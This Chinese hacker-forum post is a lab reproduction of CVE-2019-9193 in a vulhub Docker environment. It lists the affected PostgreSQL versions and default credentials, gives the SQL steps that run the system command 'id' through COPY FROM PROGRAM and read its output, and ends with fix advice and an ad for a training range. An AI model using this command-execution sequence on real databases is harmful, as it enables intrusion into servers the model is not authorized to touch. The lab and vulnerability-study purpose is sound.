跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞

精选回复

发布于

(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞

6008d15f5f4ef.png

0x00简介

PostgreSQL( 读作 Post-Gres-Q-L)是一个功用非常强大的、源代码敞开的客户/服务器联系型数据库办理体系(RDBMS)。采用相似MIT的答应协议,允许开发人员做任何事情,包含在开源或闭源产品中商用,其源代码是免费提供的。

PostgreSQL特色:

Ø 支撑WINDOWS、Linux、Solaris、macOS 、BSD。

Ø 支撑文本、图画、视频、声响等

Ø 支撑ACID、关联完整性、数据库业务、Unicode多国言语。

Ø 支撑临时表,与物化视图

Ø 支撑SQL的许多功用,例如杂乱的SQL查询,子查询,外键,触发器,视图,视图,多进程并发控制(MVCC)、异步仿制。

0x01缝隙概述

PostgreSQL是一个功用强大对象联系数据库办理体系(ORDBMS)。因为9.3增加一个“COPY TO/FROM PROGRAM”功用。这个功用便是允许数据库的超级用户以及pg_read_server_files组中的任何用户履行操作体系指令

0x02影响版别

9.3-11.2

0x03环境搭建

1. 本次缝隙环境运用vulhub中的docker搭建,vulhub下载地址:

https://github.com/vulhub/vulhub

2.下载完成后运用xftp传入安装有docker和环docker-compose境的虚拟机中解压并发动环境

cd vulhub-master/postgres/CVE-2019-9193

docker-compose up -d

1611121067_6007c1abc161f76b921eb.jpg!sma

3.运用docker ps检查是否发动成功

1611121076_6007c1b4b94af84ddeebc.jpg!sma

4.发动成功后运用navicat衔接数据库,数据库初始账号密码为postgres/

postgres

1611121083_6007c1bbe4d5f7dba4960.jpg!sma

0x04缝隙复现

注:这个缝隙介于权限提升和恣意代码履行之间,它需求一些前提权限,这些权限可所以通过正常的登录PostgreSQL也可所以通过SQL注入获得与PostgreSQL交互的途径。需求阐明的是,上述两种景象下都需求用户是一个超级用户或者是“pg_read_server_files”组用户

1.履行删除你想用来保存指令输出但是或许存在的表,这一步可有可无

DROP TABLE IF EXISTS cmd_exec

1611121091_6007c1c38e923798176dd.jpg!sma

2.创建用来保存指令输出的表

CREATE TABLE cmd_exec(cmd_output text);

1611121098_6007c1ca2f7abf69cf6cc.jpg!sma

3.通过 “COPY FROM PROGRAM”履行体系指令

COPY cmd_exec FROM PROGRAM 'id'

1611121107_6007c1d3188d3efbc8b98.jpg!sma

4.将结果显示出来

SELECT * FROM cmd_exec

1611121113_6007c1d9e5b135bc391d4.jpg!sma

5.履行其他指令

1611121120_6007c1e087a9f13397c60.jpg!sma

1611121127_6007c1e7ac1adb3867ff6.jpg!sma

6.检查账号信息

1611121137_6007c1f1724d0f57d917f.jpg!sma

0x05修正主张

1.主张升级至最新版别

2.控制数据库权限制止普通用户履行指令

在这里,给大家介绍一下“东塔攻防国际靶场”

2020年12月,东塔攻防国际靶场正式对外提供注册,各位小伙伴可通过注册后进行体会。新注册用户可获得必定的积分,关于靶场运用获取正确的Key后,也能够获取必定的经验值,经验值依据排名会不定期给予必定的奖励。

而且,在操作过程中,针对出现的Bug和安全缝隙问题能够和塔塔子提出,审阅通往后能够获得相应的奖励积分。

东塔攻防国际网站不定时推出可免费限时运用的靶场,详细可重视东塔网络安全学院推出的一系列活动或增加东塔客服了解概况。

东塔攻防国际靶场首要分为在线靶场和工作体系两大特色板块。且平台内的靶场会定期更新内容,尤其是最新缝隙复现的一些文章和靶场,会优先在靶场中提供环境让大家体会。

东塔攻防国际网站会不定期限时免费推出最新的一些复现的靶场,以供学习交流,给了大家充分体会和运用靶场的机会。

详细可重视东塔网络安全学院推出的一系列活动或增加东塔客服wx(dongtakefu)了解概况。

除了以上介绍的内容,还有更多宝藏区域,更强大的功用,等你来寻宝!

详戳下方“东塔攻防国际靶场”网址,Get一波新国际

https://labs.do-ta.com

本文作者:东塔安全学院

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。